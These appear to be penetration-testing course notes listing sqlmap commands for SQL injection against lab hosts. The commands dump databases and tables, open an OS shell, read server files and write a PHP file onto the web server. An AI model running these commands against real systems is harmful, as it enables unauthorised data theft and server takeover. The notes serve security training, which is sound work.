SQL Map¶
sqlmap -u http://sql-sandbox/sqlmap/api --method POST --data "db=mysql&name=taco&sort=id&order=asc" -p "name,sort,order"
Damp tables
sqlmap -u http://sql-sandbox/sqlmap/api --method POST --data "db=mysql&name=taco&sort=id&order=asc" -p "name,sort,order" --dbms=mysql --dump
Result:
Example for multipart/form¶
sqlmap -r request.txt
POST /test HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266 Content-Length: 552 -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="textfield"; filename="file.txt" Content-Type: text/plain This is a test file for sqlmap. -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="submit" Submit -----------------------------9051914041544843365972754266--
Reverse shell¶
sqlmap -r request.txt --os-shell
Database list and table list¶
sqlmap -r request.txt --dbs
sqlmap -r request.txt -D database_name --tables
sqlmap -r request.txt -D database_name -T table_name --dump
Read and write files¶
sqlmap -u http://app5/login.php --method POST --data "username=kaleb&password=admin" --file-read="/opt/posts/archive/85.txt"
sqlmap -u http://app5/login.php --method POST --data "username=kaleb&password=admin" --file-write="test2.php" --file-dest="/opt/posts/archive/test2.php"
References¶
- (Bernardo Damele A.G. and Miroslav Stampar, 2021), https://sqlmap.org/
- web200.SQL Injection.Database dumping with Automated Tools.SQLMap